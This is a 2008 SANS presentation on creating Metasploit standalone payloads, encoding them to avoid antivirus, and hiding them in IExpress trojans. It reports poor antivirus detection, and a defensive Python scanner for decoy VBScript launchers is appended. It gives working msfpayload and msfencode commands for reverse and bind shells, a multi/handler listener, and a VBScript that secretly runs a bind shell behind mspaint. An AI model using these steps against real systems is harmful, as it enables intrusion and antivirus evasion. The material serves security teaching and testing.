Metasploit Payloads and Antivirus
Mark Baggett
December 2008
GIAC GSEC GCIH
SANS Technology Institute - Candidate for Master of Science Degree

Objectives
• Learn how an attacker might use Metasploit standalone payloads against you
• See how these payloads are created, used and "trojanized"
• Understand what level of protection to expect from your antivirus

How are they used against you?
• Can be executed by tricking a user into running the payload, or via an exploit that is not in the framework
• Execute a payload on a fully patched system
• Use Meterpreter's advanced functionality such as anti-forensics, detection evasion, and pivoting
• Scenario:
  – Attacker brute-forces the password to a fully patched machine
  – Runs a Meterpreter payload and uses it to pivot
  – Uses the framework to attack other hosts on the DMZ

msfpayload
• Generates payloads in various formats
  – Source code in C, Perl, Ruby, Java
  – Hexadecimal (RAW)
  – Binary executable formats for Win32; Linux; OS X on Intel, PPC, iPhone
  – Java output automatically selects Big Endian or Little Endian depending upon the processor of the targeted payload
  – You can override this with a simple modification to msfpayload (js_be, js_le)

Demonstration
• See how these payloads are created

Interacting with payloads
• Some payloads will not work standalone
  – find_port, find_tag
• Bind shell payloads can be used outside of the framework
• Others require the use of the multi/handler exploit

Using multi/handler
CREATION - LHOST is the attacker's IP
./msfpayload \
  windows/vncinject/reverse_tcp \
  LHOST=192.168.100.5 X > vncrev.exe

USE - RHOST is the victim's IP
./msfcli exploit/multi/handler \
  PAYLOAD=windows/vncinject/reverse_tcp \
  RHOST=192.168.100.3 \
  DisableCourtesyShell=TRUE E

Demonstration
• See how these payloads are used

msfencode
• Will encode a payload using one of various algorithms
• Expects RAW msfpayload output as input
• -h for help
• -l list of available encoders
• -e encoder to use
• -t output type
• -b characters to avoid

msfencode -> Binary
• Binary was not a selectable output type from msfencode until Sept 29th 2008
• 3 ways to create a binary
  – Add 3 lines of code to msfencode
  – Generate RAW output and use a hex editor to place it in a binary PE format
  – Generate C source code and compile it
• -t exe option will encode a Windows binary

msfencode (continued)
• ./msfpayload windows/shell_bind_tcp R | \
    ./msfencode -e x86/shikata_ga_nai -t exe
• ./msfpayload windows/shell_bind_tcp R | \
    ./msfencode -e x86/shikata_ga_nai -b "\x41\x42\x43" -t exe
• Text.to_win32pe() uses /data/templates
  – Use your own binaries with the "PAYLOAD:" tag
  – to_win32pe chooses a random base relocation address (4 bytes at position 0x88)
  – Roll your own with template.c

Turning payloads into trojans
• IExpress is a setup utility that comes with Windows XP
• Can create packages that visibly execute a benign host program and invisibly execute a malicious payload
• All you need is a small VBScript to execute your payload invisibly
• Trojan payloads only temporarily avoid antivirus

Payload script
• The script
  Set WshShell = WScript.CreateObject("WScript.Shell")
  WshShell.Run "mspaint.exe",1, False
  Wshshell.Run "bindshell.exe",0, False
• Quick IExpress Demonstration
  – See how these payloads are "trojanized"

Level of protection to expect from your antivirus
• Expected results: Low rate of detection for unencoded payloads and no detection for encoded payloads
• Actual results: No detection for unencoded payloads or encoded payloads
• 2 products' heuristics flagged payloads
• Pauldotcom Episode 125 at the end of September 2008 found 6 systems detected the payload
• My HIPS testing yielded disappointing results
• HD Moore has stated that version 3.2 will generate a new Windows binary that is harder to detect.

Summary
• Metasploit is a powerful framework with a diverse set of tools
• Using these tools, attackers can easily create standalone payloads that run on fully patched systems
• Antivirus products do not at this time provide adequate protection against Metasploit payloads
• My paper is in the SANS reading room, titled "Effectiveness of Antivirus Detecting Metasploit Payloads"
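The launcher on the "Payload script" slide hides its second process by passing window style 0 to WshShell.Run while showing mspaint normally. The scanner below is an added example, not part of the original slides or Metasploit: it parses Run calls in VBScript text, lists the commands launched with a hidden window, and flags the visible-plus-hidden pairing that the IExpress trojan depends on. The sample script is constructed from the slide's three lines; the function names are my own.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: the three-line launcher from the slide, with the same
# pairing (mspaint shown with style 1, bindshell hidden with style 0).
SAMPLE_VBS = '''Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "mspaint.exe",1, False
Wshshell.Run "bindshell.exe",0, False
'''

# Matches <object>.Run "<command>" [, <window style> [, <wait>]]
# VBScript identifiers are case-insensitive, so "WshShell.Run" and
# "Wshshell.Run" (both spellings appear on the slide) must both match.
RUN_CALL = re.compile(
    r'\.Run\s+"(?P<cmd>[^"]*)"\s*(?:,\s*(?P<style>\d+))?',
    re.IGNORECASE,
)


def find_run_calls(script: str) -> List[Dict[str, Optional[object]]]:
    """Return every Run call with its line number, command and window style.

    style is None when the script omits the window-style argument.
    """
    calls = []
    for lineno, line in enumerate(script.splitlines(), start=1):
        for m in RUN_CALL.finditer(line):
            style = m.group("style")
            calls.append({
                "line": lineno,
                "cmd": m.group("cmd"),
                "style": int(style) if style is not None else None,
            })
    return calls


def hidden_launches(script: str) -> List[str]:
    """Commands started with window style 0, i.e. without a visible window."""
    return [c["cmd"] for c in find_run_calls(script) if c["style"] == 0]


def looks_like_decoy_launcher(script: str) -> bool:
    """True when one script both shows a program and hides another: the
    decoy-plus-payload pattern the slide's IExpress package relies on."""
    calls = find_run_calls(script)
    visible = any(c["style"] not in (0, None) for c in calls)
    return visible and bool(hidden_launches(script))


if __name__ == "__main__":
    for call in find_run_calls(SAMPLE_VBS):
        print(call)
    print("hidden launches:", hidden_launches(SAMPLE_VBS))
    print("decoy launcher:", looks_like_decoy_launcher(SAMPLE_VBS))
```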